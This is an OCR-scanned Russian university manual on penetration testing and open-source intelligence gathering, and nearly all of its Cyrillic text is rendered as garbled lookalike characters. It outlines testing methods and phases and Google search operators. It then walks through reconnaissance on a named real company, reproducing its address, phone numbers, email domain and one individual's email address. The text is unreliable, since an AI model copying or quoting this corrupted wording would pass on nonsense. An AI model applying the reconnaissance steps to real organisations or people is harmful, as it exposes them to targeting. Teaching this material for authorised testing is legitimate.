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BBE^EHHE 


,3,aHHoe yHe6HO-MeTOflHHecKoe nocoSne co^ep^cHT MaTepnajiBi, KOTOpBie 
no3BOJiHT CTy^eHTaM ocbohtb TeopeTHHecKiie ochobbi TecrapoBaHHa Ha 
npoHHKHOBeHHe h nonpaKTHKOBaTBca b BBinojiHeHHH na6opaTOpHBix pa6oT, 
nocBHLHeHHBix HHTepHeT-pa3BeflKe h 3KcnjiyaTai],HH ya3BHMOCTeii b xo,ae 
H3yneHHa ^mchhhjihhbi «TexHOJiorHJi cepTH(J)HKaii,HH cpe^CTB 3amHTBi 
HH(J)OpMaD,HH». 

IIoHHMaHHe ochob 3KcnjiyaTaii,HH yiOBHMOCTeii no3BOJiaeT CTyzjeHTaM 
0C03HaTB Ba^CHOCTB H Heo6xOflHMOCTB CepTH^HKapHH, n03BOJI5HOII];eH CHH3HTB 
pHCK HaJIHHHH HefleiOiapHpOBaHHBIX B03M0)KH0CTeH. 

CTpyKTypHO nocoSne coctoht H3 mecTH TeopeTHnecKHx pa3flenoB, b 
KOTOpBIX OnHCaHBI pa3JIHHHBie 3TanBI TeCTHpOBaHHa Ha npoHHKHOBeHHe, H flByX 
jiaSopaTOpHBix pa6oT. 

/],onojiHHTejiBHO npHBefleH cnncoK peKOMeH^yeMBix hctohhhkob, 
KOTopBiH BKJiiOHaeT jiHTepaTypy h ^pyrne hctohhhkh, pexoMeH^yeMBie 
aBTopaMH ^,jia 6onee rny6oKoro ocBoemui h noHHMaHHa /jaHHOH TeMaTHKH. 
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1 TEOPETHHECKHE OCHOBbI TECTHPOBAHHH HA 
nPOHHKHOBEHHE 


JlynniMH cnoco6 ocTaHOBHTB npecTynHHKa - .zjyMaTB, KaK npecTynHHK. 
YCTaHOBKH OXpaHHBIX CHTHajIH3aLI,HH H Orpa^CAeHHH He^OCTaTOHHO flJIH 
oSeCneHCHHa 6e30naCH0CTH OT B3JIOMa. HtoSbI 3(|)4)eKmBHO OCTaHOBHTB 
rpa6HTejia, bbi jioji>khbi npe,n,CKa3aTB ero Ka»cfl,oe flBH^ceHHe. Tohho Tax >xe fljia 
npe^OTBpameHHa KOMnpoMeTan,HH hh (j)pacTpyKTyp bi opraHH3an,HH - aynmnS 
cnoco6 - 3to flyMaTB, xax 3JioyMBinmeHHHK. 

O^hh H3 nonyjiapHBix cnoco6oB ohchkh KOMnaHHJiMH CBoen 
3aiu,HmeHHOCTH 0T aTaK - sto npHBjieneHHe BHemHux (J)HpM h HCCJie,n,OBaTejieH 
6e3onacHOCTH, KOTopBie cneu,HajiH3HpyK)Tca Ha TecTHpoBaHHH 6e3onacHOCTH 
KOMnBIOTepHBIX CHCTeM. 

Hccae^OBaTejiB 6e3onacHOCTH HBjnieTca «3thhhbim xaxepOM», KOTOpBiS 
HaHHMaeTca opraHroapHeH jxjik Toro, hto6bi nonBiTaTBca CKOMnpoMeTHpOBaTB 
ceTB KOMnaHHH c pejiBio opeHKH ee 6e3onacHOCTH. ITepefl jho6bim 
TecTHpoBaHHeM MOK/jy 3axa3HHKOM h HCCJieflOBaTejieM 6e3onacHOCTH 
3aiaiK)HaeTca ^oroBOp, b kotopom nponncBiBaiOTca orpaHMHeHHH. OrpaHHMCHHa 
o6bimho onpe^ejiaiOT to, hto mo^kot h He mokct 6bitb c^enaHO b xojie 
TecTHpoBaHHa Ha npoHHKHOBeHHe. HanpnMep, HccjieflOBaTejiK) 6e3onacHOCTH, 
xax npaBHjio, He pa3pemaeTca bbihojihjitb aTaxn Ha OTKa3 b o6cjiy5KHBaHHH Ha 
H,ejieByio ceTB hjih BHe^paTB BHpycBi. TeM He MeHee, oSbcm TecmpoBaHira, 
BBinojiHaeMoro HcejieflOBaTejieM 6e3onacHOCTH, BapBHpyeTca b 3aBHCHMOCTH ot 
noTpeSHOCTeii opraHH3au,HH. 

CymecTByeT hcckojibko mctoaob TecmpOBaHHH Ha npoHHKHOBeHHe: 

1. MeTO,a; «nepHoro jmiHKa». B xo^e Taxoro TecrapOBaHHH 
HCCJieflOBaTejno HeH3BecTHO HHnero o cera KOMnaHHH. HanpnMep, ecjin sto 
BHeuiHee TecmpoBaHHe mcto^om «nepHoro 5Hu;HKa», HCCJieflOBaTejiio MO^ceT 
6bitb npeflOCTaBJieH tojibko a^pec Be6-caHTa h ero 3aaaneH aBJiaeTca 
OCymeCTBHTB B3JIOM TaK, KaK eCJIH 6 bI OH 6 bIJI peaJIBHBIM 3JIOyMBIUIJieHHHKOM. 

2. MeTOfl, «6ejioro amHKa». B xo^e TecmpoBaHHH no MeTO^y «6ejioro 
auiHKa» HcejieflOBaTejiB HMeeT nojiHoe npe^CTaBjieHHe o BHyrpeHHeii 
opraHH3au,HH cem. nepefl npoBeASHHeM TecTOB Hceae^OBaTejiK) Moryr 6bitb 
npeflOCTaBjieHBi cxeMBi cem hjih cnncoK HcnojiB3yeMBix onepan,HOHHBix chctcm 
h npHjio^ceHHH. Xoth b peajiBHOH >kh 3 hh TaKaa CHTyau,Ha MajiOBepoaTHa, mctoa 
nBjiaeTca Han6ojiee 3(])(j)eKTHBHBiM h tohhbim, Tax xax oh npe^CTaBjiaeT co6oh 
Hanxy^uiKH cpeHapHH, npn kotopom 3JioyMBimjieHHHK HMeeT nojiHoe 
npejjCTaBJieHHe o cem. 

3. Memfl «ceporo auiHKa». B xo^e TecrapoBaHHu no MeTOjjy «ceporo 
5mjHKa» HcejieflOBaTejiB HMHrapyeT ^eiiCTBHa coTpyzjHHKa opraHH3apHH, to ecTB 
oh nojiynaeT ynerayK) 3anncB jxjik ^ocTyna k BHyrpeHHeH cem h CTaH^apTHBie 
npaBa Ha .zjocTyn. 3tot mctoa no3BOJiaeT ohchhtb BHyrpeHHHe yrpo3Bi, 
HCXOflaillHe CO CTOpOHBI COTpyflHHKOB KOMnaHHH. 
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Hccue^OBaTejiH 6e3onacHOCTH h iii vt ya3BHMOCTH h yrpo3bi 
6e3onacHOCTH. 

YB3BHMOCTB - 3T0 CJia 60 CTb, HepOCTaTOK, HCnOJIb3yH KOTOpblH M05KH0 

HaMepeHHO HapyniHTb ee ueaocTHOCTb h Bbi3BaTb HenpaBHjibHyio pa6oTy. 

Yrp03a npe^CTaBjiaeT co6oh noTeHijHajibHoe HapymeHHe 6e3onacHOCTH, 
KOTOpoe MOHceT HaHecra ymep6, Taxon KaK pacKpbirae KOHcl)H^eHu,HajibHbix 
^aHHbix, H3MeHeHHe paHHbix, yHHHTOxceHne paHHbix hjih OTKa3 b 
06 cJiy>KHBaHHH. 

3aiu,HTbi aKTHBOB ot yrpo3 b jik)6oh HH^pacTpyKType HeoSxopHMO 
oSecnenHBaTb hx 6e3onacHOCTb. Yrpo3bi Moryr 6bm> CBH3aHbi c 
KOH^H^eHLlHaJIbHOCTbK), peJIOCTHOCTbK) HJIH flOCTynHOCTbK). 

1. Yrp03a HapymeHHa KOHcjjHpeHHMajibHOCTH 3aKjnoHaeTca b tom, hto 
cymecTByeT pncx pacKpbmra HHcjjopMaiiHH tom, kto He pacnojiaraeT 
nojiHOMOHHUMH pocTyna k Hen. OHa HMeeT MecTO, Korpa nojiyneH pocTyn k 
H eKOTOpOH HHcjjopMauHH orpaHHneHHoro pocTyna, xpaHameiica b 
B biHHCJiHTejibHOH CHCTCMe hjih nepepaBaeMOH ot ophoh chctcmbi k ppyron. 

2. Yrpo3a pejiocTHOCTH (HenpaBOMepHoro H3MeHeHHa paHHbix). - sto 
pHCK H3MeHeHHB JiaHHbIX HeaBT0pH30BaHHbIMH n0JIb30BaTejWMH. 

3. Yrp03a pocTynHOCTH npepcTaBJiaeT co6oh C03jiaHHe tbkhx 
ycjiOBHH, npn KOTOpbix pocTyn k ycjiyre hjih HH(jiopMaLiHH SypeT jih6o 
3a6jiOKHpOBaH, jih6o B03M0>KeH 3a BpeMa, KOTOpoe He o6ecneHHT BbinojiHeHHe 
Tex hjih HHbix 6H3Hec-u;ejieH. 

npe^nojiaraeTca, hto HCCJiepyeMaji HH(J)pacTpyKTypa 3amHmeHa, Korpa 
B03M0)KH0CTb yTCHKH, Kpa>KH HJIH H3MeHeHHB 06 pa 6 aTbIBaeM 0 H HH^OpMapHH 
coxpaHaeTca Ha npneMjieMOM ypOBHe. IIpHeMjieMbiH ypoBeHb onpepejiaeTca 
nyreM npoBepemui aHajiH3a 3aTpaT-pHCKOB, npn KOTOpOM CTOHMOCTb 3aipHTbi 
jiaHHbix conocTaBjiaeTca c phckom noTepn hjih KOMnpoMeTauHH paHHbix. U,ejib 
TecTHpoBaHHa Ha npoHHKHOBeHHe 3aKjiiOHaeTca He b chhjkchhh pHCKa po Hyjia, 
a b CHH^ceHHH pncxa po npHeMjieMoro ypoBHa, ycTaHOBjieHHoro pyKOBopcTBOM. 
B KOHeHHOM CHCTe, OCTaeTCB HeKOTOpblH OCTaTOHHblH pHCK, KOTOpblH MO>KeT 
6bITb npHHBT. 

OcHOBHaa pejib TecTHpOBaHHH Ha npoHHKHOBeHHe - 3 to othct no 
pe3yJIbTaTaM TeCTHpOBaHHJI, KOTOpblH npH3BaH npHBJieHb BHHMaHHe 
pyKOBopcTBa k cymecTByiomeii B opraHH3apHH nojiHTHKe 6e3onacHOCTH. 

IIOJIHTHKa 6e30naCH0CTH - 3TO POKyMeHT, B KOTOpOM H3JiaraiOTCB JiyHHIHe 

MeTopbi oSecneHeHHB 6e3onacHOCTH BHyrpH opraHH3apHH, ycTaHOBJieHHbie 
JIHpaMH, OTBeTCTBeHHbIMH 3a 3amHTy aKTHBOB OpraHH3apHH. YH3BHMOCTH 
CHCTeMbi 6e3onacHOCTH cyipecTByiOT He H3-3a BHeppeHHOH tcxhohothh hjih 
KOH^HrypapHH, a noTOMy, hto nojiHTHKa 6e3onacHOCTH He ycTparoieT npoSjieMy 
hjih noTOMy hto, nojib30BaTejiH He cjiepyiOT 3toh nojiHTHKe. 

npH TeCTHpOBaHHH Ha npoHHKHOBeHHe Ba>KHO pa3JIHHaTb nOHUTHH 
cymecTByiomeH ya3BHMOCTH h ya3BHMOCTH HyjieBoro phb. Yn3BHMOCTb 
HyjieBoro phji — 3to HepoKyMeHTHpOBaHHaa HOBaa yjnBHMOCTb, npOTHB 
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KOTopofi enje He pa3pa6oTaHbi 3amHTHbie MexaHH3Mbi. Yji3bhmocth HyjieBoro 
A,hb npe^CTaBjiaiOT co6oh cepbe3Hyio onacHOCTb, Tax KaK npeflOTBpaTHTb hx 
BoenpoHSBeAeHHe 3aHacTyio aBjraeTca TpyzjHoii 3ajiaHeH. Jlynmen npaKTHKofi 
3aiu,HTbi ot aTax c Hcnojib30BaHHeM ya3BHMOCTeii HyjieBoro aha BBjiaeTca 
BHe^peHHe 3BpHCTHHecKoro aHajiH3a hjih oSHapyaceHHa Ha ocHOBe cmnaTyp. 

THnoBbie ^aKTOpbi B03HHKH0BeHHA yrp03 6e3onacHOCTH h 

Heo6xOflHMOCTH B nOBe^eHHH TeCTHpOBaHHB Ha npOHHKHOBeHHe: 

1. BecnpoBO^Hbie jioicajibHbie cera. EecnpOBOAHbie ceTH nojib3yiOTca 
nonyjiapHOCTbK) bo mhothx opraHH3apHax Sjiaro^apB npocTOTe Hcnojib30BaHHx 
h thSkocth. OflHaKO 6ecnpOBOflHbie cera BoenpHHMHHBbi k noACJiyniHBaHHio. 

2. CjiOKHaa Tonojionni ceTH. PaHbme 6biJio AOCTaTOHHO oahoh 
onepau,HOHHOH CHCTeMbi ynpaBjieHini ceTbio. CeroAHJi <xj\ mhhh CTpaTopbi 
nOMHMO OCHOBHbIX 3a^,aH no dJJ MHHH CTp HpO BAH H K) 60 JIbIH 0 r 0 HHCJia Cpe,Zl,CTB 
3amnTbi h ceTeBoro o6opyn,OBaHHJi noAAepACHBaiOT pa6oTy HecKOJibKnx 
onepauHOHHbix chctcm. A TeM BpeMeHeM TexHOJiorHH ycjiOACHjnoTca c Ka^biM 
ro^OM. CTaTHnecKoro Be6-caiiTa, pa3MemeHHoro Ha Be6-cepBepe, 
He^ocTaTOHHO. Tenepb KOMnaHiniM Tpe6yeTca hcckojibko MoxceTeBbix sxpaHOB, 
mn^poBajibHbix cpe^CTB, KjiacTepbi c 6ajiaHCHpoBKoii Harpy3KH, cepBepHbie 
6a3bi ^aHHbix h flHHaMHnecKHe HHTepijieHCHbie Be6-caHTbi. TaKoe noBbimeHHe 
CJI05KH0CTH TeXHOJIOrHH H TOnOJIOrHH CeTeH 3aTpyaHXeT aflMHHHCTpaTOpaM 
oSecnenHBaTb AOJDKHyio 3am;HTy ot yrpo3 6e3onacHOCTH h CBoeBpeMeHHyio 
ycTaHOBKy eooTBeTCTByiomHx naTHeii. 

3. HacTOTa oShobjichhh nporpaMMHoro oSecneneHHB. Hapa^y c 
noBbimeHHeM cjiokhocth nponcxoAHT yBejiHneHHe KOJinnecTBa HcnpaBJieHHH 
(naTHefi) nporpaMMHoro oSecneneHHa, KOTopbie Heo6xo,n,HMO ycTaHaBjiHBaTb. 
A^MHHHCTpaTopaM Tpy/iHO ocTaBaTbca b xypce Bcex Heo6xoAHMbix 
HcnpaBJieHHH, hto6bi ycTaHOBHTb hx CBoeBpeMeHHO h o6e3onacHTb cboh 
CHCTeMbi. B pe3yjibTaTe chctcmm ocTaiOTca Heo6HOBjieHHbiMH h, 

CJICAOBaTCJIbHO, ya3BHMbIMH A JIB aTaKH. 

4. MapKeTHHroBbie TpeSoBaHira. OHHaHCOBbie ynpoK^CHHa, HHTepHeT- 

Mara3HHbi h n,eHTpbi o6pa6oTKH AaHHbix - 3to HeSojibmoH nepencHb ranoB 
KOMnaHHH, KOTopbie npo^aiOT cboio 6e3onacHyio ceTb noTCHpHajibHbiM 
KJiHeHTaM. TecTHpOBaHHe Ha npOHHKHOBeHHe hcoSxoahmo npOBepKH 

6e3onacHOCTH HH(J)pacTpyKTyp TaKHx KOMnaHHH. HHor^a pe3yjibTaTbi tcctob 
TaKyKe npe^OCTaBJHHOTCX nOTCHHHaJIbHblM KJIHCHTaM. 

5. AocTynHOCTb HHCTpyMeHTOB B3JiOMa. CymecTByeT mhokcctbo 
nporpaMMHbix cpejjCTB juix ocymecTBJieHHx aTaK Ha cera, Sojibhimhctbo H3 
KOTopbix 6ecnjiaTHbi h HaxoAflTCfl b otkpbitom AOCTyne. Hto eme xyace, ajib 
paSoTbi MHorae H3 sthx HHCTpyMeHTOB He Tpe6yiOT ACTajibHoro noHHMaHHa 
npHHtjHnoB paSoTbi ceTeii h KOMnbiOTepa, hto o6jiernaeT npoBefleHHe aTax ajix 
B cex, kto HMeeT 6a30Bbie HaBbiKH BJia^eHHa KOMnbiOTepoM. 

6. OTxpbiToe nporpaMMHoe oSecneneHHe. HecMOTpa Ha to, hto 
,zi;ocTynHOCTb hcxoahmx koaob BBJiaeTca npeHMymecTBOM juia mhothx, oho 
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Taioice ynpomaeT npon,ecc odHapyjxeHira ya3BHMOCTen. nocxojibxy xaxepbi 
TaioKe Moryr HHTaTb hcxoahwh koa, ohh Moryr 6biCTpo o6Hapy>KMBaTb 
ya3BHMOCTH, HanpHMep, ya3BHMOCTH, CBB3aHHbie c nepenojiHeHHeM 6yc])epa, 
no3BOJMK)iu,He HapymHTb pa6oTy nporpaMMbi hjih npMBOAfluiHe k BbinojiHeHHio 
npoH3BOJibHoro Ko^a. 

7. HeKOHTpojiHpyeMbie yn;ajieHHbie nojib30BaTejiH. Bee 6 ojibine h Sonbine 
KOMnaHHH no 3 BOJiBK)T coTpyAHHxaM paSoTaTb yAaneHHO. K coxanemno, 
aAMHHHCTpaTopbi 6e3onacHOCTH He Moryr KOHTpojiHpOBaTb 3th yAaneHHbie 
CHCTeMbl. 3jIOyMbIHIJieHHHKH, KOTOpbie 3HaiOT 06 3THX yAaJieHHbIX 
coeAHHeHHBx, Moryr Hcnojib30BaTb hx b cbohx HHTepecax. KoMnaHHH Moryr 
HaHHMaTb HcejieAOBaTeneH 6 e 3 onacHOCTH jxjik Toro, hto6bi BbinojiHBTb 
TecTHpoBaHHe no MeTOAy «ceporo HinnKa», npn kotopom npoH 3 BOAHTca 

HMHTaH,HB A6HCTBHH yAajieHHbIX n0JIb30BaTejieH H npOH3BOAHTCB nOnbITKa 
nojiyneHHB AOCTyna n noBbimeHHB cbohx npnBHjierHH bo BHyrpeHHHx CHCTeMax. 

3Tanbi TecTHpoBaHHB Ha npOHHKHOBeHHe: 

IlepBbiH 3Tan -pa3eedKa. Ha 3Tane pa3B6AXH HcejieAOBaTejib npoH3BOAHT 
nonbiTKH co6paTb xax mo>xho 6ojibme MHcjjopManHH o BbiSpaHHOH n,ejiH. 
Pa3BeAKa Mo^ceT 6biTb axTHBHoii h naccHBHoii. npn axTHBHoii pa3B6Axe 
HCCJieAOBaTejib 6e3onacHOCTH Hcnojib3yeT Taxne HHCTpyMeHTbi, xax nslookup, 
dig hjih SamSpade, htoSbi nccjieAOBaTb pejieByio ceTb, HanpHMep, c pejibio 
onpeAeJieHHa Anana30Ha IP-aApecoB. npn naccHBHOH pa3BeAtiBaTejibHOH aTaxe 
HCCJieAOBaTejib 6e3onacHOCTH Hcnojib3yeT odmeAOCTynHyio HH^opMapmo ajbi 
Toro, HTodbi y3HaTb o TexHOJiornax, Hcnojib3yeMbix b opraHH3au;HBx. 

Btopoh 3Tan - cKanupoeanue. 3Aecb nccjieAOBaTejib 6e3onacHOCTH 
HsynaeT TonojiorHio ceTH nyreM cxaHHpoBaHira OTKpbiTbix nopTOB c noMombio 
TaKHx HHCTpyMeHTOB, xax NMap. U,ejib - onpeAejiHTb cjiy>x6bi, 3anymeHHbie Ha 
n,ejieBbix xocTax. Taioxe Ha stom 3Tane HcejieAOBaTejib 6e3onacHOCTH 
BbinojiHaeT onpejiejieHHe rana onepan,HOHHOH CHCTeMbi. 3Tan cxaHHpOBaHHB 
Taioxe BXjuonaeT npOBepxy Ha HajiHHiie ya3BHMOCTeii. TecTHpOBamie Ha 
HajiHHHe yn3BHMOCTeH npeAinecTByeT odHapyaceHHio mctoaob ajib nojiyneHHB 
AOCTyna x n,ejieBOMy y3Jiy. 

nojiyuenue doemyna - nocne npoBepxn peneBoii cera Ha HajiHnne 
yn3BHMOCTeH, HCCJieAOBaTejib 6e3onacHOCTH nbiTaeTca axcnjiyarapoBaTb 3th 
ya3BHMOCTH h, b cjiynae ycnexa, npeAnpHHHMaeT rnarn ajib noAAep^aHHB 
AOCTyna x pejieBOMy xocTy. 

IJoddepDfcanue doemyna ocymecTBJiaeTca nyTeM ycTaHOBXH SaxAopoB, 
xoTopbie no3BOjnnoT HCCJieAOBaTejiio 6e3onacHOCTH noBTOpHO noAxmoHaTbca x 
CHCTeMe. 

nocjieAHHH 3Tan TecTHpOBaHHU - ydanenue doKa3amejibcme (cjiedoe 
nponuKHoeenuR). HccjieAOBaTejiH npOBepaiOT, Moryr jih 6bm> CTepTbi cJiaMJibi 
jxypHanoB, xpaHamne cjieAbi hx axTHBHOCTH b ceTH. 
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2 CBOP HHOOPMAIJHH 


IlepBMH 3Tan B3JI0Ma JIK) 60 H HH^OpMapHOHHOH CHCTeMbI HaHHHaeTCa CO 
c6opa MaKCHMajibHoro KOJinnecTBa HH(|)opMaii,HH o n,ejiH. FTpaKTHHecKH HHKor^a 
He yaaeTca co6paTb bcio HH(|)opMaii,Hio H3 OAHoro-e^HHCTBeHHoro HCTOHHHKa. 
/],aHHBie npHXOflHTCH Co6HpaTB H3 MHOHCeCTBa pa3JIHHHBIX MeCT, C TeM HTOSbl 
BnOCJieflCTBHH nOJiyHHTb nOJIHyiO KapTHHy HH(l)OpMaHHOHHOH CHCTeMbI 
opraHH3au;HH. 

Ha ^aHHOM 3 Tane BbiHBJiaiOTca cjia 6 bie MecTa cera, nepe 3 KOTopbie b 
S yzjymeM h 6 yn;eT ocymecTBJiaTbca npOHHKHOBeHne b CHCTeMy. npH 
npaBHjibHOM nofl,xofl,e mo>kho He tojibko BbiaBHTb noTeHii,HajibHO ya 3 BHMbie 
MeCTa, HO H HaMeTHTb B 03 M 0 >KHbie BeKTOpbl aTaKH Ha o 603 HaMeHHyK) H,ejlb. 

npoBe^eHHH ycneniHOH aTaKH Han^eT npHMeHeHHe jno6aa ^ocTynHaa 
HH^opMaiiHa o npe^npHaTHH. 

06bihho, HMea tojibko Ha3BaHHe opraHH3aii,HH, HaHHHaiOT c6op 
cjieAyfouiHx /jaHHbix: 

• ,n,OMeHbi; 

• ceTeBbie a^peca hjih ceTeBbie 6 jiokh; 

• MecTOHaxo>KAeHHe; 

• KOHTaKTHaa HH(|)opMau,Ha; 

• HOBOCTH O CJIHUHHH HJIH npHOSpeTCHHH; 

• BaxaHCHH; 

• ccbuiKH Ha CBB3aHHbie c opraHH3aH,Heii Be6-eepBHCbi; 

• pa3JiHHHbie /jOKyivieHTbi; 

• CTpyKTypa opraHH3apHH. 

3to tojibko npHMepHbiii cnncoK, h npoflOJiacaTb ero mojkho jjocTaTOHHO 
flOJiro. HanpnMep, npocMOTpeB BaKaHCHH npejinpHaraa, Moamo y3HaTb, KaKHe 
HH(J)opMaii,HOHHbie CHCTeMbI Hcnojib3yiOTca BHyrpH opraHH3aii,HH. A 
npoaHajiH3HpoBaB HTML-koji jiOMauiHeii CTpaHHHKH, mo>kho Haiira ccbijikh Ha 
BHyrpeHHHe pecypcw. Ot toto, KaK 6yn,eT npoBejieH c6op HH(J)opMaii,HH, 3aBHCHT 
HanpaBjieHHe, a TaioKe ran h ycneniHOCTb aTaKH. Eojibinaa nacra npoH,ecca c6opa 
HH(J)opMaii,HH He Tpe6yeT cneuHajibHbix 3HaHHH, jiocTaTOHHO yMCHHa 
nojib30BaTbca hohckobbimh CHCTeMaMH. 3anacTyio ohh HH^eKcnpyiOT jia'ace Ty 
HH(J)OpMaH,HIO, KOTOpyiO nbITajIHCb CKpbITb OT BHeiHHeTO MHpa. 

2.1 Hcnojib30BaHHe Google ^jih c6opa iiH(|)opMamiii 

XaKep hjih ay^HTop moikct Hcnojib30BaTb juia c6opa HH(J)opMaii,HH He 
tojibko Google, ho TaK^ce Yahoo hjih jiio6oh ^pyron hohckobbih cepBHC. /Jjia 
ycKopeHHa h o6jiemeHHa npoH,ecca noncKa h c6opa HH(j)opMaij,HH moikho 
H cnojiB30BaTB onepaTopbi noncKa. Be3 hhx OTbicKaTb Hymiyio HHcjjopMaiiHK) 
6yn,eT He npocTO cjioikho, ho npaKranecKH HeB03M0iKH0. 
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HanpnMep, no 3anpocy royalmail Google BbipaeT okojio 61 800 000 
pe3yra>TaTOB. IIo 3anpocy site:royalmail.com — 261 000, a nocae yTOMHCHHa 
site:royalmail.com filetype:doc — Bcero 5. 

TaKHM o6pa30 M, mbi H3 nojiyMnjuinappa pe3yjibTaTOB noncKa 
OT(J)HJIBTpOBajIH TOJIBKO TO, HTO HaM 6bIJIO HHTepeCHO. 

OnepaTOpbi: 

• onepaTop site orpaHHHHT BbiBO^ pe3yjibTaTOB 3anpoca HH^opMapnen 
c opHoro caiha (npnMep ncnojib30BaHna - site:nic.ru); 

• onepaTop filetype ncnojib3yeTca pna noncica cfjanjiOB onpepejieHHoro 
rana (npnMep ncnojib30BaHna - filetype:doc); 

• onepaTop inurl nipeT 3apaHHbin tckct tojibko b url caiiTa; 

• onepaTop intitle nipeT HH^opMapnio, ncxopa H3 3arojiOBKa 
poKyMeHTa. 

2.2 IIohck iiH(|)opMau,iin o jnopnx 

Ecjih bbi Hanuin cnncoK coTpyapnKOB KOMnaHnn, to dypeT nojie3HbiM 
co6paTb o hhx Kax mo)kho 6ojibme HH^opMapnn. ^obojibho nacTO dbreaeT, hto 
b3jiom pecypca, KOTOpbiii, Ka3anocb 6bi, He HMeeT HHKaKoro OTHomeHna k 
opraHH3an;HH, KOTOpyio mbi nbiTaeMca B3JiOMaTb, npHBopnT k ee 
KOMnpoMeTapnn. TaKoe bo3mo>kho, ecjin coTpypHHKH ncnojib3yiOT ophh h Te »ce 
napojin pna pocTyna k pa3JiHHHbiM cncTeMaM. 

JlynniHM mcctom noncKa HH(J)opMan,HH, paBHO Kax n pjra 3anap,Hbix 
KOJiJier, ocTaiOTca copnajibHbie cera. Ejiaropapa TOMy, hto hmh nojib3yeTca 
orpOMHoe KOJinnecTBO mopeii, ohh CTaHOBaTca 6e3poHHbiM hctohhhkom 

HH(J)OpManHH. no HHM MO>KHO OTCJiepHTb BCe - Kapbepy, o6pa3 5KH3HH, 

HHTepecbi n MHoroe ppyroe. nojib3yacb paHHbiMH o reoMeTKax (|)OTorpa(j)HH 
mo>kho nocMOTpeTb, hto nponcxopnT 3a 3aKpbiTBiMH pBepaMH opraHH3apnH. 

2.3 IIohck no apxHBHbiM paHHbiM 

nT06bi HanTH HH(J)opMan,HK), KOTOpyio opraHH3an,na npoicpe nydjnncoBajia 
b HmepHeTe, a 3aTeM ypajinna (no npnHHHe ponycica ouihOkh hjih noTepn 
aKTyajiBHOCTH paHHon HH(J)opMan,Hn) mo>kho Boenojib30BaTbca cepBncoM 
archive.org. 3 to Tax Ha3biBaeMbin apxnB HmepHeTa, KOTOpbiii codnpaeT Konnn 
Be6-CTpaHHn„ rpa(J)nnecKne MaTepnajibi, Bnpeo- n aypH03anncn n nporpaMMHoe 
odecneneHne. ApxnB odecneHHBaeT pojirocpOHHoe apxnBnpoBaHne codpaHHoro 
MaTepnajia n decnjiaTHbiii pocTyn k cbohm da3aM paHHbix pjih uinpOKon 
nydjiHKH. 
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2.4 ^eMOHCTpaiiHH c6opa iiH(|)opi\iau,iiii 

ripOBe^eM c6op HH(|)OpMaU,HH H3 OTKpbITbIX HCTOHHHKOB O KOMIiaHHH 
AO «HIIO «3mejiOH». C noMombio Google Hafi^eM caiiT opraHH3au,HH 
(pHCyHOK 1). 


Google 


HflO «3wenoH» 




Bee Hoboctvi KapTHHKn Bufleo Kaptbi Eiqe HacrpoiiKM klHCTpyMeHTbi 


PeaynbTaTOB: npuMepHO 128 000 ( 0,93 ceK.) 


HI10 amenoH 

https://npo-echelon.ru/ ▼ 

KoMnneKCHan m nHcpopMaunoHHan OeaonacnocTb: peweHUfl no aaiqMTe nH(popMaunn, aTTecTaqun, 
cepTH0nKaqnfl cucTeM h cpeflCTB 3aiqnTbi MHCpopMaqun m ... 

O KOMnaHMM JlHL(eH3MM 

AO «HnO «3wenoH» JlnueH3nn m arrecTaiw aKKpeflmaqmi 

cneqnann3npyeTCfl Ha... Ha ... 


npoflyKTbi 

ripOflyKTb) HMeiOT CepTHCpHKaTb) 
<t)CT 3 K Poccmm m Mhho6opohw ... 


KOHTaKTbl 

KoHTaKTbi AO "HnO “SwenoH”. OtpMC 
b MocKBe: Tene<poHbi m ... 


flpyme peaynuraTbi c catiTa npo-echelon.ru » 



HnO SLUenOH Be6<a*T Mapuipyr 

3,7 ★ ★★* 3 OT 3 biBa Ha Google 

0<|)HC KOMnaHMM 


BaKaHCMM KOMnaHMM HnO SwenoH - pa6oia b MocKBe - Hh 

https://hh.ru/employer/158206 ▼ 

Pa6oTa b KOMnaHMM HflO 3wenoH. HHCpopMaqMfl o KOMnaHMM m Bee on<pbiTb»e BaKaHCMM b MocKBe. 


Aopec: 3neiapo3aBOflCKafl yn., 24, MocKBa, Poccmb, 107023 

TenecpOH: +7 495 223-23-92 

BpeMfl pa6oTbi: Macbi pa6oTbi ceroflHH - 10-19 ^ 


HnO aiUe/lOH — HaUHOHanbHafl 6n6/1HOTeKa MM. H. 3. BayMaHa n P ewno*MTb McnpasneHMe • Bbi - enafleneu 3 tom opraHM3a 4 MM? 

ru.bmstu.wiki/HnO 3iuenoH ▼ 


PneyHOK 1 - IlOHCK HH(f)OpMaUHH O KOMIiaHHH HIIO «3mejI0H» 


^jib onpeflejieHHB noHTOBbix yneTHbix 3annceH coTpy^HHKOB 
opraHH3au,HH, Hy^cHO npoaHajiH3HpoBaTb HHcfiopMaitHK) Ha caiiTe. 
IIpoaHajiH3HpoBaB pa3^eji «KoHTaKTbi» onpe^ejiaeM oShjhh noHTOBbra .zjOMeH 
opraHH3au;HH «@npo-echelon.ru» (pncyHOK 2). 


I BiueAOH 


+7 (495) 223-23-92 ru/en 
8 800 100-05-02 


<X 


Bxoa Ana najmirpon 


O KOMnaHMM ycnyrvi flpoflytaw PeaiewMB j Koht3Ktw 


O KOMnaHMM 


■ Mmccmm 

■ KenanU 

■ Bmuchjmm 

■ BflMHCMM 

■ Kahchtw 

■ riapTHcpw 

■ KenTMTM 



KoHiaKTbi AO "HIIO "3ojo/ioh" 


4 UKIjuI^ 


8 (495) 223-23-92 

8 800-100-05-02 (OcovuthwA mohok no »ce* Pocoxm) 
Shypo: *»0_ECH&0ft QQSS3 


• /Vu«H3nD©a*M*«: 

• TexnoaaepKKjj 

• npaoaKM: 



• Arrocrau***: »{tta:Snpo-tchtl©n.ai 

• PCO, MM -ocTflftm*: go»Onpo-ech«<on.ryj 

• CMuimp nortpoaki: nwi iffnao-pcfiiHon.ru, oncpurhia muon 

• CM, t ri, 00c tpoc_worVCnpo-ncholan.ru 


107023, r. Moocm, yn. 9ner>paM0Qacicai>. a. 2* (imu co cropoww 2-ro S/tpctpoMBOACxoro 
npppynva). Knpra. 


KnwmaAuiMe craniiPM wetpo 9ncir>pQjaaoACH«ii, npco6pa*cnc«B nnoiuMb. 


PncyHOK 2 - IIohck HH(J)opMaii,HH o coTpyzjHHKax KOMnaHHH 


AHajiH3Hpya kohtcht caiiTa, o6Hapy>KHBaeM npHMep nepcoHajibHOH 
3JieKTpoHHoii noHTbi «a.markov@bmstu.ru» b pa3^ejie «ny6jiHKau;HH» 
(pHCyHOK 3). 
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DO I: 1 0.1 869S/0236-3933-2016-1-98-1 1 1 


YRK 004.956 

